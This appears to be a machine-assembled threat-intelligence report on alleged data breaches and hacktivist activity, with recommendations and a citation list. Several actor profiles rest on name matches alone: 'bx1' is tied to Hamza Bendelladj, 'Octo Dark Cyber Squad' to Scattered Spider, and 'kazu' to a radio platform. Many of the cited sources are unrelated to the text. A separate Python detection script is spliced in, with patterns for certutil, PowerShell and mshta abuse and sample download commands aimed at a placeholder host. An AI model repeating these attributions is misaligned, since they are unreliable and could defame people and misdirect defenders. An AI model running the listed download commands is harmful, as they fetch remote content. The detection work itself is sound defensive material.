Threat Actor Profile: Dark Storm Team

Dark Storm Team is a hacktivist group that emerged in September 2023, primarily driven by pro-Palestinian and anti-NATO narratives [1]. The group blends ideology with opportunism, often leveraging claims of cyberattacks on high-profile targets to advertise their “DDoS-for-hire” services and monetize mainstream social media attention [1]. This dual motivation, political and financial, is exemplified by their launch of a “DARKSTORM Solana cryptocurrency coin” after claiming responsibility for an X (formerly Twitter) outage [1]. This highlights the increasing intertwining of hacktivism with cybercrime and the use of cryptocurrencies for funding and monetization.

Dark Storm is primarily known for executing large-scale DDoS attacks against government, defense, transportation, education, financial, media, and technology sectors.49 Their operations, which lead to widespread service disruptions and reputational damage, are organized and amplified through Telegram channels and dark web forums, where they share attack playbooks and recruit participants.49 For anonymity and resilience, they employ VPNs, proxy chains, and botnet networks.49 While they frequently claim responsibility for major outages, such as those affecting X, Zoom, and Spotify in early 2025, analysis has shown they sometimes overstate the impact of their attacks.1

Associated Resources:

Incident INC20250624-020: Alleged Data Breach of 160 Turkish Online Casino Databases

Incident Details:

The threat actor markosic is claiming to have breached and obtained member information from 160 different Turkish online casino platforms. This incident highlights the targeting of the gambling industry for financial gain, as member information can be used for various fraudulent activities.

Threat Actor Profile: markosic

Specific threat intelligence on a malicious actor or group named “markosic” is not available in the provided research.32 This name may represent an individual actor or a less prominent entity within the cybercrime landscape.

Associated Resources:

Incident INC20250624-021: Alleged leak of Malaysian senior citizen database

Incident Details:

The threat actor Market Exchange claims to be selling a database of 180,000 Malaysian senior citizens aged over 50. This is a significant data leak, potentially impacting a vulnerable demographic and raising concerns about identity theft and targeted scams.

Threat Actor Profile: Market Exchange

As noted previously, the term “Market Exchange” in the context of cybercrime typically refers to illicit online marketplaces or forums where stolen data, access credentials, and cybercrime tools are bought and sold.42 It is not generally identified as a specific threat actor group.44 These marketplaces are a critical component of the cybercrime ecosystem, facilitating the monetization of breaches and enabling various forms of fraud.45 The presence of such a listing suggests that an individual or group is attempting to sell compromised data through these channels.

Associated Resources:

Incident INC20250624-022: Alleged data leak of Malaysian investors

Incident Details:

The threat actor Market Exchange claims to be selling a database of 130,000 wealthy Malaysian investors. This is a high-value data leak, as information on affluent individuals can be used for sophisticated financial scams, phishing, and other targeted attacks.

Threat Actor Profile: Market Exchange

As noted previously, the term “Market Exchange” in the context of cybercrime typically refers to illicit online marketplaces or forums where stolen data, access credentials, and cybercrime tools are bought and sold.42 It is not generally identified as a specific threat actor group.44 These marketplaces are a critical component of the cybercrime ecosystem, facilitating the monetization of breaches and enabling various forms of fraud.45 The presence of such a listing suggests that an individual or group is attempting to sell compromised data through these channels.

Associated Resources:

Incident INC20250624-023: Alleged data leak of Malaysian individuals

Incident Details:

The threat actor Market Exchange claims to be selling a database of 200,000 Malaysian individuals associated with health products, including their ID card information. This is another significant data leak, providing personal identifiers that can be exploited for various illicit activities.

Threat Actor Profile: Market Exchange

As noted previously, the term “Market Exchange” in the context of cybercrime typically refers to illicit online marketplaces or forums where stolen data, access credentials, and cybercrime tools are bought and sold.42 It is not generally identified as a specific threat actor group.44 These marketplaces are a critical component of the cybercrime ecosystem, facilitating the monetization of breaches and enabling various forms of fraud.45 The presence of such a listing suggests that an individual or group is attempting to sell compromised data through these channels.

Associated Resources:

Incident INC20250624-024: Alleged data breach of CETDIGIT

Incident Details:

The threat actor morse claims to be selling a 19.2-million-record B2B database reportedly stolen from cetdigit.com, a Salesforce Crest and HubSpot Elite Partner. The data includes full names, verified business emails, job titles, company names, full addresses, and phone numbers, with global coverage but a focus on North America and Europe. The breach affects industries such as finance, healthcare, manufacturing, and retail. This is a significant B2B data breach with wide-ranging implications.

Threat Actor Profile: morse

Specific threat intelligence on a malicious actor or group named “morse” is not available in the provided research.50 The term “morse” is not mentioned in Microsoft’s threat actor naming taxonomy.50 This suggests “morse” might be an individual or an ephemeral alias rather than a well-documented threat group.

Associated Resources:

Incident INC20250624-025: Alleged data breach of X

Incident Details:

A threat actor named bx1 claims to have breached data from X (formerly Twitter). The compromised dataset reportedly contains over 200 million email and password combinations. This is a massive data breach of a major social media platform, with significant implications for user security.

Threat Actor Profile: bx1

“bx1” is the alias of Hamza Bendelladj, an Algerian cyberhacker and carder born in 1988, also known as the “Smiling Hacker”.51 He was on Interpol’s and the FBI’s top 10 most wanted hackers list for allegedly embezzling tens of millions of dollars from over 200 American and European financial institutions.51 Bendelladj, using pseudonyms like “BX1” or “Daniel HB,” developed and operated the “SpyEye Botnet” with a Russian accomplice named Aleksandr Andreevich Panin (aka “Gribodemon”).51 This malicious software infected over 60 million computers worldwide, primarily to harvest credit card numbers, online bank logins, and PINs, leading to estimated losses of approximately one billion dollars between 2010 and 2012.51 Bendelladj was arrested in Thailand in 2013 and extradited to the United States, where he pleaded guilty and was sentenced to 15 years in prison.51 His release from prison has sparked debate regarding his symbolic status as a resistance figure against banking systems.51

Associated Resources:

Incident INC20250624-026: Alleged data breach of Hospital Civil de Guadalajara

Incident Details:

The threat actor kazu claims to be selling data from a major breach of the Mexican government’s Hospital Civil de Guadalajara (hcg.gob.mx), a prominent public healthcare institution in Jalisco. The breach includes 33,358 files totaling 7.6 GB of data, allegedly containing sensitive hospital-related records. This is a critical breach impacting patient data and healthcare operations.

Threat Actor Profile: kazu

The name “kazu” in the context of a threat actor is not associated with a specific, well-documented cybercrime group in the provided research.54 “Kazu” appears to be a common name, and in some contexts, it refers to individuals in the cybersecurity industry or general discussions about cybercrime.55 For instance, Dina Temple-Raston, a journalist, has hosted discussions with “real-life hackers” on a platform called KAZU.55 The term also appears in discussions about ransomware as a business model and the vulnerabilities of critical infrastructure.56 Therefore, “kazu” is likely an individual actor or a temporary alias rather than an established threat group.

Associated Resources:

Incident INC20250624-027: Alleged data leak of Ministry of Agriculture of the Republic of Indonesia

Incident Details:

The threat actor KEDIRISECTEAM claims to be selling a database containing detailed personal and business information of 8,438 millennial and “andalan” (reliable) farmers in Indonesia. The leaked data includes full names, gender, national ID numbers (NIK), addresses, birth details, phone numbers, emails, and links to ID card and passport photos. It also contains sensitive business-related information such as agricultural subsectors, commodities produced, business income ranges and averages, and involvement in government-supported loan programs like KUR (Kredit Usaha Rakyat). This is a highly sensitive data breach impacting a critical sector and personal livelihoods.

Threat Actor Profile: KEDIRISECTEAM

Specific threat intelligence on a malicious actor or group named “KEDIRISECTEAM” is not extensively detailed in the provided research.12 The name appears in contexts related to general cybercrime discussions, including mentions of ransomware operations and illegal APKs.59 While the provided research does not offer a comprehensive profile, the group’s alleged activities align with financially motivated data theft.

Associated Resources:

Incident INC20250624-028: Alleged data breach of Direktorat Jenderal Kependudukan dan Pencatatan Sipil

Incident Details:

The threat actor HIME666 claims to have breached the data of Dukcapil Indonesia (Direktorat Jenderal Kependudukan dan Pencatatan Sipil). The compromised data includes names, addresses, ages, dates of birth, and other fields. This is a significant breach of national citizen data, with broad implications for identity security.

Threat Actor Profile: HIME666

Specific threat intelligence on a malicious actor or group named “HIME666” is not available in the provided research. This name may represent an individual actor or a less prominent entity within the cybercrime landscape.

Associated Resources:

Incident INC20250624-029: Alleged data leak of Malaysia visa data

Incident Details:

The threat actor HIME666 claims to have leaked Malaysia visa data. This type of data leak can have implications for national security and individual privacy.

Threat Actor Profile: HIME666

Specific threat intelligence on a malicious actor or group named “HIME666” is not available in the provided research. This name may represent an individual actor or a less prominent entity within the cybercrime landscape.

Associated Resources:

Incident INC20250624-030: Alleged data leak of Malaysia Airlines customers

Incident Details:

The threat actor Market Exchange claims to be selling a leaked dataset containing 210,000 Malaysia Airlines First Class customers, including passport details. This is a significant data breach impacting the aviation industry and high-value individuals.

Threat Actor Profile: Market Exchange

As noted previously, the term “Market Exchange” in the context of cybercrime typically refers to illicit online marketplaces or forums where stolen data, access credentials, and cybercrime tools are bought and sold.42 It is not generally identified as a specific threat actor group.44 These marketplaces are a critical component of the cybercrime ecosystem, facilitating the monetization of breaches and enabling various forms of fraud.45 The presence of such a listing suggests that an individual or group is attempting to sell compromised data through these channels.

Associated Resources:

Incident INC20250624-031: Alleged data leak of credit card details and bank data

Incident Details:

The group Octo Dark Cyber Squad(Official) claims to have publicly leaked a dataset containing 1,500 credit card and bank records from individuals in the UK and USA. This is a direct financial data leak, posing immediate risks of fraud to the affected individuals.

Threat Actor Profile: Octo Dark Cyber Squad(Official) (Scattered Spider/Octo Tempest)

“Octo Dark Cyber Squad(Official)” is an alias for “Octo Tempest,” which overlaps with research associated with “Scattered Spider” (also known as UNC3944, 0ktapus, Muddled Libra, and Scatter Swine).61 Scattered Spider is a financially motivated, highly adaptive, English-speaking threat actor collective active since at least 2022.64 They have evolved from large-scale phishing operations to sophisticated hybrid intrusions, combining social engineering, identity system abuse, cloud exploitation, and ransomware deployment.64

Key features of Scattered Spider include specializing in social engineering tactics such as SMS phishing, SIM swapping, and MFA fatigue, often abusing identity and access management systems for persistent access.64 They initially focused on telecom and BPO but later pivoted to hospitality, retail, tech, finance, and media.64 They have collaborated with ransomware groups like ALPHV/BlackCat and Qilin for double extortion.64 Octo Tempest is described as a highly bespoke and hands-on threat actor, often engaged in “keyboard-to-keyboard combat” and showing extreme persistence even after being detected.61 They prefer to use existing tools and functionalities within a compromised system (“living off the land”) rather than deploying traditional malware, making their activities harder to detect.61

Associated Resources:

Incident INC20250624-032: Alleged data breach of CGI India

Incident Details:

The threat actor HIME666 claims to have breached the data of CGI India. The compromised data consists of names, email addresses, cities, phone numbers, and other fields. This is a data breach impacting an IT services company, which can have broader implications if client data is also affected.

Threat Actor Profile: HIME666

Specific threat intelligence on a malicious actor or group named “HIME666” is not available in the provided research. This name may represent an individual actor or a less prominent entity within the cybercrime landscape.

Associated Resources:

Incident INC20250624-033: Alleged leak of FBI leaders' data

Incident Details:

A threat actor named uralxploitvhem claims to have leaked a database allegedly belonging to the Federal Bureau of Investigation (FBI). The compromised data reportedly includes personal information of FBI leadership, such as addresses and other sensitive details. This is a highly sensitive national security incident, potentially involving state-sponsored espionage or a significant hacktivist operation.

Threat Actor Profile: uralxploitvhem

Specific threat intelligence on a malicious actor or group named “uralxploitvhem” is not available in the provided research.65 This name may represent an individual actor or a less prominent entity within the cybercrime landscape.

Associated Resources:

Incident INC20250624-034: Alleged data breach of LuxService

Incident Details:

The threat actor RXY claims to have leaked a dataset from the admin panel of LuxService in Luxembourg (LU). The exposed database includes personal information of users such as full names, email addresses, phone numbers, and home addresses. The post lists over 25 individuals, with details pointing to residents of Luxembourg, and some entries from Kampala and other locations. This is a data breach impacting an IT services company and its users.

Threat Actor Profile: RXY

The term “RXY” in the context of a threat actor is not associated with a specific, well-documented cybercrime group in the provided research.50 In some contexts, “XRY” refers to mobile forensics and data recovery software.66 In others, it appears in general discussions about cybercrime or threat actor identification without defining “RXY” as a specific malicious entity.50 Therefore, “RXY” is likely an individual actor or a temporary alias rather than an established threat group.

Associated Resources:

Incident INC20250624-035: Alleged leak of ALMOASHER BUSINESS (ERP & CRM)

Incident Details:

A threat actor named HIME666 claims to have leaked a complete 46 GB dataset from Al Moasher Business, a company that specializes in developing administrative software solutions, including Enterprise Resource Planning (ERP) systems, Customer Relationship Management (CRM) programs, web applications, websites, and business consulting services. This is a significant data breach impacting a software and consulting firm, with potential implications for its clients.

Threat Actor Profile: HIME666

Specific threat intelligence on a malicious actor or group named “HIME666” is not available in the provided research. This name may represent an individual actor or a less prominent entity within the cybercrime landscape.

Associated Resources:

The incidents observed over the past 24 hours, combined with broader threat intelligence, reveal several critical trends shaping the current cybersecurity landscape.

The cybercrime ecosystem continues to evolve into a highly professionalized and industrialized domain. Ransomware gangs, for instance, function like illicit businesses, complete with hierarchical structures, affiliate programs, and even “customer support” for victims.45 This includes specialized roles such as coders, negotiators, access brokers, and money launderers, indicating a mature and organized criminal industry.45 The presence of established forums and communities dedicated to various cybercrime subcategories further solidifies this structure.7

Ransomware remains a dominant threat, but its methods are undergoing significant evolution. The emergence of new ransomware groups is a constant feature of the threat landscape. A particularly notable development is the strategic shift towards pure data extortion models, as exemplified by World Leaks.33 In this model, threat actors forgo data encryption, focusing solely on exfiltrating sensitive information and threatening its public disclosure if a ransom is not paid.33 This adaptation means that traditional recovery strategies, such as relying on robust backups, are no longer sufficient to mitigate the full impact of an attack, as the reputational and regulatory consequences of data exposure persist.

The professionalization of cyber extortion is further evidenced by the adoption of sophisticated business models by cybercrime organizations. These entities operate distinct platforms for data leaks, victim negotiations, and affiliate management, mirroring legitimate SaaS operations.33 This structured approach, complete with strategic branding and psychological tactics to coerce victims, indicates a calculated effort to maximize illicit profits.33 Some criminal groups even engage in “criminal branding,” strategically avoiding attacks on sensitive targets like hospitals or schools to manage public perception and potentially reduce law enforcement scrutiny.45

A critical component of this sophisticated ecosystem is the role of Initial Access Brokers (IABs). These specialized actors focus on gaining initial access to networks and then selling these access credentials to other threat groups, including ransomware operators.44 This division of labor creates a complex supply chain of illicit services, where a single initial compromise can be monetized multiple times by different actors, leading to cascading attacks. This interconnectedness means that an organization’s initial breach might not be the ultimate objective of the initial attacker but rather a stepping stone for a subsequent, more damaging attack by another group.

The increasing intersection of hacktivism, cybercrime, and cryptocurrency is also a prominent trend. Groups like Dark Storm demonstrate dual motivations—political and financial—by offering DDoS-for-hire services and even launching their own cryptocurrency coins.1 This signifies that hacktivists are not solely driven by ideology but are also seeking financial sustainability and new ways to monetize their activities, making them more resilient and persistent. The use of cryptocurrencies for funding and monetization creates new challenges for tracking and disrupting illicit financial flows.

The scale of cybercrime infrastructure is exemplified by massive botnet operations. The case of Yunhe Wang and the “911 S5” botnet, which comprised millions of compromised devices globally, demonstrates how such large-scale infrastructure is rented out to facilitate a wide range of cybercrimes, from identity theft to financial fraud.29 The billions in estimated losses attributed to this single operation underscore the foundational role of such infrastructure in enabling widespread criminal activity.

DDoS attacks have become a weaponized tool for political disruption, propaganda, and even as a revenue stream. Hacktivist groups strategically employ DDoS attacks for political, social, and religious motivations, often in coordinated campaigns and as part of “DDoS-as-a-service” offerings.36 This elevates DDoS from a mere technical nuisance to a significant component of hybrid warfare, capable of disrupting critical services and eroding public trust.

Finally, a concerning development is the escalation of some sophisticated cybercriminal groups towards zero-day exploitation and maintaining long-term persistence within compromised networks.15 XE Group’s evolution to using zero-day vulnerabilities and maintaining access for years blurs the lines between advanced cybercrime and nation-state APTs.15 This indicates a significant investment in advanced capabilities by some financially motivated groups, challenging the assumption that only nation-states engage in such sophisticated, persistent campaigns. Despite this, even highly sophisticated APTs, such as APT29, continue to rely on a combination of social engineering and exploiting known, unpatched vulnerabilities for initial access and persistence, rather than exclusively using zero-days.68 This highlights that even the most advanced adversaries will often exploit the easiest path, which frequently involves unpatched systems or human weaknesses.

V. Conclusions and Recommendations

The current cyber threat landscape is characterized by its fluidity, professionalization, and a dangerous convergence of motivations and capabilities among threat actors. The traditional distinctions between cybercriminals and hacktivists are diminishing, with many groups adopting hybrid models that combine ideological goals with financial gain. This evolution, coupled with the increasing sophistication of financially motivated actors and the weaponization of tactics like DDoS and data extortion, presents a complex challenge for organizations worldwide. The reliance on supply chain compromises and the strategic use of zero-day exploits by some groups further amplify the risk, demonstrating a shift towards more targeted and persistent campaigns.

To effectively counter these evolving threats, organizations must adopt a proactive and intelligence-led security posture. The following recommendations are critical:

Enhanced Threat Intelligence and Profiling

Organizations must invest in tailored threat intelligence capabilities to understand specific adversaries, their motivations, and their Tactics, Techniques, and Procedures (TTPs).12 This involves moving beyond generic security practices to develop a personalized threat landscape that focuses on the threats most relevant to the organization’s specific security goals, business vertical, and critical assets.12 Continuously updating these profiles allows for anticipatory defense and more effective allocation of security investments.12

Robust Vulnerability Management and Patching

Despite the rise of zero-day exploitation, many sophisticated attacks, even by APTs, still leverage known and unpatched vulnerabilities.68 Implementing a rigorous and timely vulnerability management program, including regular patching and configuration hardening, is fundamental. Prioritizing patches for vulnerabilities known to be exploited in the wild can significantly reduce the attack surface against a wide range of adversaries.68

Comprehensive Security Awareness Training

Given that human vulnerabilities remain a primary attack vector, particularly through social engineering tactics like phishing, smishing, vishing, and SIM swapping,37 continuous and adaptive security awareness training is paramount. Training should educate employees on identifying sophisticated social engineering attempts and reporting suspicious activities, thereby strengthening the human firewall.37 This also extends to mitigating insider threats, whether malicious or unintentional.37

Strengthening Supply Chain Security

The increasing targeting of third-party vendors and development environments for intellectual property theft and broader supply chain compromises necessitates robust due diligence and security controls for all external partners.46 Organizations should implement strict access controls, conduct regular security audits of their supply chain, and monitor for any suspicious activity originating from trusted third-party connections. Securing development pipelines, including GitHub repositories and source code, is crucial to prevent cascading vulnerabilities.46

Advanced Detection and Response Capabilities

To counter the “living off the land” techniques and the long-term persistence tactics employed by sophisticated threat actors, organizations need advanced endpoint detection and response (EDR) and network monitoring capabilities.15 These tools enable the detection of abnormal use of legitimate system tools and scripts, which often bypass traditional signature-based security solutions. Effective threat hunting, forensic analysis, and rapid incident response capabilities are essential to minimize the impact of breaches.47
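The detection principle behind this recommendation, as an added example that is not from the report or from any EDR product: a small Python hunt that flags anomalous use of legitimate Windows tools in process-creation telemetry, combining argument-pattern rules with an unusual-parent check. The telemetry format, field names, rule set and sample events are all constructed for this illustration.

```python
"""Flag abnormal use of legitimate Windows tools ("living off the land")
in process-creation telemetry.

Constructed example: the key="value" log format, the rules and the sample
events below are made up for illustration and are not a vendor's schema.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent: str   # parent image name, lower-cased
    image: str    # process image name, lower-cased
    cmdline: str


# Each rule pairs a legitimate tool with an argument pattern that is rarely
# seen in routine administration. Patterns are kept narrow so the rule fires
# on misuse of a feature, not on the mere presence of the tool.
LOLBIN_RULES = [
    ("certutil.exe", re.compile(r"-urlcache\b.*\bhttps?://", re.I),
     "certutil used to fetch a remote file"),
    ("mshta.exe", re.compile(r"\b(javascript|vbscript):|https?://", re.I),
     "mshta executing inline script or a remote HTA"),
    ("rundll32.exe", re.compile(r"\bjavascript:", re.I),
     "rundll32 executing inline JavaScript"),
    ("powershell.exe",
     re.compile(r"-enc(odedcommand)?\b|\bdownloadstring\b|\biex\b", re.I),
     "PowerShell with encoded or download-and-execute arguments"),
    ("regsvr32.exe", re.compile(r"\bscrobj\.dll\b|/i:https?://", re.I),
     "regsvr32 loading a remote scriptlet"),
]
LOLBIN_IMAGES = {tool for tool, _, _ in LOLBIN_RULES}

# Interpreters and script hosts that, together with the tools above, should
# not normally be spawned by document viewers, mail clients or browsers.
INTERPRETERS = LOLBIN_IMAGES | {"cmd.exe", "wscript.exe", "cscript.exe"}
UNUSUAL_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe",
                   "msedge.exe", "chrome.exe", "acrord32.exe"}


def parse_event(line):
    """Parse one constructed key="value" telemetry line."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return ProcessEvent(fields["host"], fields["user"],
                        fields["parent"].lower(), fields["image"].lower(),
                        fields["cmdline"])


def score_event(ev):
    """Return (severity, reason) findings for one event; [] when benign."""
    findings = []
    for tool, pattern, desc in LOLBIN_RULES:
        if ev.image == tool and pattern.search(ev.cmdline):
            findings.append(("high", desc))
    # Parent-child anomaly: an Office/browser process launching an interpreter
    # is suspicious regardless of the command line (macros, exploit payloads).
    if ev.parent in UNUSUAL_PARENTS and ev.image in INTERPRETERS:
        findings.append(("medium", f"{ev.image} spawned by {ev.parent}"))
    return findings


def hunt(lines):
    """Run every rule over the telemetry and return alerts as dicts."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        for severity, reason in score_event(ev):
            alerts.append({"host": ev.host, "user": ev.user, "image": ev.image,
                           "parent": ev.parent, "severity": severity,
                           "reason": reason})
    return alerts


# Constructed telemetry: two benign admin actions on ws01, then a chain that
# mimics a macro-launched download and two other tool-abuse patterns.
SAMPLE_TELEMETRY = [
    'host="ws01" user="alice" parent="explorer.exe" image="certutil.exe" cmdline="certutil -verify corp-root.cer"',
    'host="ws01" user="alice" parent="explorer.exe" image="powershell.exe" cmdline="powershell.exe Get-Date"',
    'host="ws02" user="bob" parent="WINWORD.EXE" image="cmd.exe" cmdline="cmd.exe /c certutil -urlcache -split -f http://example.invalid/a.txt a.txt"',
    'host="ws02" user="bob" parent="cmd.exe" image="certutil.exe" cmdline="certutil -urlcache -split -f http://example.invalid/a.txt a.txt"',
    'host="ws03" user="carol" parent="outlook.exe" image="powershell.exe" cmdline="powershell.exe -nop -w hidden -enc SQBFAFgA"',
    'host="ws04" user="dave" parent="explorer.exe" image="mshta.exe" cmdline="mshta.exe javascript:close()"',
]

if __name__ == "__main__":
    for a in hunt(SAMPLE_TELEMETRY):
        print(f'{a["severity"]:6} {a["host"]} {a["user"]}: {a["reason"]}')
```

In practice the unusual-parent set and argument patterns would be tuned against the organisation's own baseline so that legitimate automation does not flood the queue.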

Geopolitical Awareness in Cyber Defense

The growing influence of geopolitical events on cyberattacks, particularly through state-sponsored hacktivism and information operations, requires security teams to integrate geopolitical intelligence into their threat models.1 Understanding the political motivations and affiliations of threat groups can help anticipate potential targets and attack campaigns, especially for organizations operating in sensitive sectors or regions.

By adopting these comprehensive strategies, organizations can enhance their resilience against the complex and ever-evolving cyber threat landscape, moving towards a more proactive and intelligence-driven defense posture.

Works cited

  1. Global Hacktivist Threats – Graphika, accessed June 24, 2025, https://graphika.com/reports/global-hacktivist-threats
  2. Weekly Intelligence Report – 06 June 2025 – cyfirma, accessed June 24, 2025, https://www.cyfirma.com/news/weekly-intelligence-report-06-june-2025/
  3. Tangible Risks, Intangible Opportunities: Long-term Risk Preparedness and Responses for Threats to Cultural Heritage – ICOMOS Open Archive, accessed June 24, 2025, http://openarchive.icomos.org/1509/1/ICOMOS_2012_Proceedings_final.pdf
  4. Identifying a Threat Actor Profile, accessed June 24, 2025, https://oasis-open.github.io/cti-documentation/examples/identifying-a-threat-actor-profile.html
  5. Cyber Investigations – Secret Service, accessed June 24, 2025, https://www.secretservice.gov/investigations/cyber
  6. Cybersecurity – Homeland Security, accessed June 24, 2025, https://www.dhs.gov/topics/cybersecurity
  7. Threat actor | Flashpoint, accessed June 24, 2025, https://flashpoint.io/intelligence-101/threat-actor/
  8. Cyber Threat Profile | Google Cloud, accessed June 24, 2025, https://cloud.google.com/security/resources/datasheets/cyber-threat-profile
  9. Threat Actor Profiles – Page 5 of 7 – SOCRadar® Cyber Intelligence Inc., accessed June 24, 2025, https://socradar.io/category/threat-actor-profiles/page/5/
  10. Handala’s Wiper: Threat Analysis and Detections | Splunk, accessed June 24, 2025, https://www.splunk.com/en_us/blog/security/handalas-wiper-threat-analysis-and-detections.html
  11. ASPJOC – INTERPOL Asia and South Pacific Joint Operations on Cybercrime, accessed June 24, 2025, https://www.interpol.int/Crimes/Cybercrime/Projects/ASPJOC-INTERPOL-Asia-and-South-Pacific-Joint-Operations-on-Cybercrime
  12. Threat Profiles – Google Threat Intelligence – VirusTotal, accessed June 24, 2025, https://gtidocs.virustotal.com/docs/threat-profiles-guides
  13. Threat Actor profile: SideCopy – Cyble, accessed June 24, 2025, https://cyble.com/threat-actor-profiles/sidecopy/
  14. Reflections of the Israel-Iran Conflict on the Cyber World …, accessed June 24, 2025, https://socradar.io/reflections-of-israel-iran-conflict-cyber-world/
  15. From credit card fraud to zero-day exploits: Xe Group expanding cybercriminal efforts, accessed June 24, 2025, https://cyberscoop.com/xegroup-zero-day-exploit-intezer-labs-solis-security-vietnam/
  16. Adobe Investigating Reader X 0-day Security Hole on Sale for $50,000 – TNW, accessed June 24, 2025, https://thenextweb.com/news/adobe-investigating-reader-x-0-day-security-hole-allegedly-selling-on-the-black-market-for-50000
  17. OS X zero day bug allows hackers to bypass system integrity protection – HelpNet Security, accessed June 24, 2025, https://www.helpnetsecurity.com/2016/03/24/os-x-zero-day-bug-allows-hackers-bypass-system-integrity-protection/
  18. Hacktivist Group Claims Cyberattack That Spurred Multiple X Outages on Monday, accessed June 24, 2025, https://www.bitdefender.com/en-gb/blog/hotforsecurity/hacktivist-group-claims-cyberattack-that-spurred-multiple-x-outages-on-monday
  19. Naseer Babangida Muazu http://etd.uwc.ac.za/ – CORE, accessed June 24, 2025, https://core.ac.uk/download/344926090.pdf
  20. i Editorial Climate change is upon us all and its impact is not gender, accessed June 24, 2025, https://njssh.nust.edu.pk/index.php/njssh/issue/download/24/9
  21. (PDF) Cyber Security Threats to Malaysia: A Small State Security Discourse – ResearchGate, accessed June 24, 2025, https://www.researchgate.net/publication/349881373_Cyber_Security_Threats_to_Malaysia_A_Small_State_Security_Discourse
  22. Hacktivism – Wikipedia, accessed June 24, 2025, https://en.wikipedia.org/wiki/Hacktivism
  23. Cyber Security and Fraud Control Prevention and Detection – iProject Download, accessed June 24, 2025, https://www.iprojectdownload.com/cyber-security-and-fraud-control-prevention-and-detection/
  24. Cybersecurity Threats Among Information Managers in Cloud-Based Information Systems in Kano State Electricity Distribution Company, accessed June 24, 2025, https://journal.ijprse.com/index.php/ijprse/article/download/1108/1070/1829
  25. Four Members of Notorious Cybercrime Group ‘FIN9’ Charged for Roles in Attacking U.S. Companies – Department of Justice, accessed June 24, 2025, https://www.justice.gov/usao-nj/pr/four-members-notorious-cybercrime-group-fin9-charged-roles-attacking-us-companies
  26. 4 FIN9-linked Vietnamese Hackers Indicted in $71M U.S. Cybercrime Spree, accessed June 24, 2025, https://thehackernews.com/2024/06/4-fin9-linked-vietnamese-hackers.html
  27. Profiles of Cyber-Attackers and Attacks | 1 | Cyber-Security Threats, – Taylor & Francis eBooks, accessed June 24, 2025, https://www.taylorfrancis.com/chapters/edit/10.1201/9781003006145-1/profiles-cyber-attackers-attacks-dimitrios-kavallieros-georgios-germanos-nicholas-kolokotronis
  28. CVE-2025-22462 – Exploits & Severity – Feedly, accessed June 24, 2025, https://feedly.com/cve/CVE-2025-22462
  29. Authorities arrest man allegedly running ‘likely world’s largest ever’ cybercrime botnet – Newsday, accessed June 24, 2025, https://www.newsday.com/business/botnet-cybercrime-pandemic-fraud-malware-identity-theft-online-fraud-m71889
  30. Threat Actor Profile – GhostSec – Outpost24, accessed June 24, 2025, https://outpost24.com/blog/threat-actor-profile-ghostsec/
  31. Ghost Security – Wikipedia, accessed June 24, 2025, https://en.wikipedia.org/wiki/Ghost_Security
  32. Threat Actor Profiles – Malware Patrol, accessed June 24, 2025, https://www.malwarepatrol.net/threat-actor-profiles/
  33. World Leaks: An Extortion Platform – Lexfo’s security blog, accessed June 24, 2025, https://blog.lexfo.fr/world-leaks-an-extortion-platform.html
  34. UBS confirms employee data leak after ransomware attack on …, accessed June 24, 2025, https://siliconangle.com/2025/06/18/ubs-confirms-employee-data-leak-ransomware-attack-supplier/
  35. Rare Werewolf APT Uses Legitimate Software in Attacks on Hundreds of Russian Enterprises – The Hacker News, accessed June 24, 2025, https://thehackernews.com/2025/06/rare-werewolf-apt-uses-legitimate.html
  36. Escalating Hacktivist Attacks Amidst India-Pakistan Tensions – Radware, accessed June 24, 2025, https://www.radware.com/security/threat-advisories-and-attack-reports/escalating-hacktivist-attacks-amidst-india-pakistan-tensions/
  37. Threat Actor – Arctic Wolf, accessed June 24, 2025, https://arcticwolf.com/resources/glossary-uk/what-is-a-threat-actor/
  38. Insights from the front: Cyber security arms race picks up | ITWeb, accessed June 24, 2025, https://www.itweb.co.za/article/insights-from-the-front-cyber-security-arms-race-picks-up/GxwQDM1DkON7lPVo
  39. U.S. Army Cyber Command: Operate, Defend, Attack, Influence, Inform, accessed June 24, 2025, https://www.arcyber.army.mil/
  40. Iran-Linked Threat Actors Leak Visitors and Athletes … – Resecurity, accessed June 24, 2025, https://www.resecurity.com/blog/article/iran-linked-threat-actors-leak-visitors-and-athletes-data-from-saudi-games
  41. Cyber Fattah Leaks Data from Saudi Games in Alleged Iranian …, accessed June 24, 2025, https://www.infosecurity-magazine.com/news/cyber-fattah-leaks-data-saudi-games/
  42. Cyber, Crypto Assets and Emerging Technology – SEC.gov, accessed June 24, 2025, https://www.sec.gov/about/divisions-offices/division-enforcement/cyber-crypto-assets-emerging-technology
  43. APWG’s Crypto Currency Efforts, accessed June 24, 2025, https://apwg.org/crypto-currency-apwg/
  44. The Top Threat Actor Groups Targeting the Financial Sector …, accessed June 24, 2025, https://flashpoint.io/blog/top-threat-actor-groups-targeting-financial-sector/
  45. Inside the Ransomware Marketplace: How Threat Actors Operate …, accessed June 24, 2025, https://cybersteward.com/inside-the-ransomware-marketplace-how-threat-actors-operate/
  46. Deloitte Data Breach: Threat Actor “303” – Varindia, accessed June 24, 2025, https://www.varindia.com/public/news/deloitte-data-breach-threat-actor-303
  47. Ultimate Guide to Building a SOC and SIEM Career in 2025 – Rokibul’s Website, accessed June 24, 2025, https://rokibulroni.com/blog/ultimate-guide-to-soc-siem-career-2025/
  48. Radware reports hybrid warfare as cyberattacks, disinformation …, accessed June 24, 2025, https://industrialcyber.co/threats-attacks/radware-reports-hybrid-warfare-as-cyberattacks-disinformation-escalate-in-2025-israel-iran-conflict/
  49. Dark Storm Is Coming – Are You Safe Enough to Handle It? – Safe …, accessed June 24, 2025, https://safe.security/resources/blog/dark-storm-is-coming-are-you-safe-enough-to-handle-it/
  50. How Microsoft names threat actors – Unified security operations …, accessed June 24, 2025, https://learn.microsoft.com/en-us/unified-secops-platform/microsoft-threat-actor-naming
  51. Hamza Bendelladj – Wikipedia, accessed June 24, 2025, https://en.wikipedia.org/wiki/Hamza_Bendelladj
  52. What Is Spyware? Definition, Types and How to Prevent It – NordLayer, accessed June 24, 2025, https://nordlayer.com/learn/threats/spyware/
  53. International Cybercriminal Extradited from Thailand to the United States, accessed June 24, 2025, https://www.justice.gov/archives/opa/pr/international-cybercriminal-extradited-thailand-united-states
